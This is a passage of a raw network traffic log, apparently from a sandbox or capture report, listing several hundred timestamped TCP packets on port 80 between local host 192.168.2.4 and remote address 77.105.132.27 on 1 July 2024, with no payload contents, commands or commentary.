Jul 1, 2024 09:16:17.595885038 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.595894098 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.595900059 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.595913887 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.595916033 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.595928907 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.595936060 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.595943928 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.595954895 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.595958948 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.595974922 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.595980883 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.595989943 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.596005917 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.596012115 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.596020937 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.596030951 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.596036911 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.596052885 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.596061945 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.596066952 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.596084118 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.596090078 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.596098900 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.596107960 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.596115112 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.596131086 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.596138000 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.596165895 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.596808910 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.596832037 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.596847057 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.596853971 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.596862078 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.596869946 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.596875906 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.596890926 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.596892118 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.596905947 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.596910000 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.596918106 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.596920967 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.596935987 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.596941948 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.596951008 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.596966028 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.596971035 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.596982002 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.596990108 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.596997023 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.597012043 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.597014904 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.597027063 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.597042084 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.597043991 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.597057104 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.597064972 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.597073078 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.597089052 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.597094059 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.597110033 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.597141981 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.597589016 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.597604036 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.597618103 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.597629070 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.597632885 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.597657919 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.597836971 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.689043999 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.689064026 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.689080000 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.689143896 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.689169884 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.689174891 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.689184904 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.689199924 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.689222097 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.689214945 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.689249992 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.689280033 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.689443111 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.689459085 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.689472914 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.689480066 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.689487934 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.689502001 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.689507008 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.689517975 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.689522028 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.689532995 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.689542055 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.689548969 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.689564943 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.689567089 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.689589977 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.689621925 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.689871073 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.689884901 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.689899921 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.689913988 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.689923048 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.689929962 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.689944983 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.689951897 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.689960957 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.689970970 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.690002918 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.690203905 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.690218925 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.690232992 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.690238953 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.690254927 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.690269947 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.690275908 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.690284967 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.690299988 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.690303087 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.690315008 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.690325975 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.690340042 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.690355062 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.690356016 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.690371037 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.690404892 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.690831900 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.690846920 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.690856934 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.690860987 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.690876007 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.690885067 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.690891027 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.690917969 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.690921068 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.690937996 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.690944910 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.690953970 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.690962076 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.690968990 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.690983057 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.690988064 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.691001892 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.691009045 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.691015959 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.691020012 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.691030979 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.691045046 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.691051960 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.691060066 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.691076040 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.691082001 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.691091061 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.691107988 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.691163063 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.691201925 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.691201925 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.691973925 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.691988945 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.692002058 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.692015886 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.692024946 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.692030907 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.692042112 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.692045927 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.692060947 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.692063093 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.692075968 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.692090988 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.692100048 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.692106962 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.692115068 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.692120075 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.692121983 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.692137003 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.692151070 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.692167044 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.692171097 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.692183018 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.692188025 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.692198992 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.692203999 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.692224026 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.692234039 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.692239046 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.692245960 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.692257881 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.692282915 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.692305088 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.692337036 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.692683935 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.692701101 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.692744017 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.692848921 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.692873001 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.692888021 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.692889929 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.692903042 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.692909956 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.692918062 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.692924023 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.692934036 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.692935944 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.692950010 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.692955971 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.692965984 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.692972898 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.692981005 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.692985058 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.692996025 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.693003893 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.693011045 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.693026066 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.693032026 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.693039894 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.693044901 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.693054914 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.693056107 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.693078041 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.693098068 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.693099976 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.693116903 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.693133116 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.693140030 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.693160057 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.693177938 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.693818092 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.693833113 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.693846941 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.693861961 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.693869114 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.693876982 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.693886042 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.693892956 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.693898916 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.693907022 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.693922997 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.693923950 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.693931103 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.693938017 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.693953037 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.693958044 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.693968058 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.693975925 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.693981886 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.693988085 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.693996906 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.694011927 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.694016933 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.694026947 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.694036007 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.694041967 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.694053888 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.694055080 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.694067001 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.694164991 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.783736944 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.783756971 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.783772945 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.783804893 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.783809900 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.783824921 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.783832073 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.783838987 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.783847094 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.783864021 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.783894062 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.784075975 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.784091949 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.784106970 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.784121990 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.784128904 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.784137011 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.784147024 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.784152031 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.784166098 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.784168959 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.784190893 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.784219027 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.784399033 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.784421921 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.784442902 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.784446955 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.784457922 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.784460068 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.784472942 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.784478903 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.784487963 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.784511089 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.784522057 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.784526110 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.784540892 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.784553051 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.784555912 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.784570932 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.784580946 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.784590960 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.784614086 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.784625053 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.784934998 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.784950972 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.784987926 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.785016060 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.785074949 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.785089970 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.785104990 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.785120964 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.785129070 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.785135984 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.785156965 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.785160065 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.785173893 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.785182953 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.785187960 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.785202980 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.785209894 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.785218000 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.785229921 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.785233021 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.785247087 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.785262108 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.785263062 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.785278082 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.785293102 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.785300016 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.785300016 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.785336971 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.785931110 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.785947084 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.785960913 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.785974979 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.785979986 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:17.785990000 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:17.785994053 CEST	49752	80	192.168.2.4	77.105.132.27
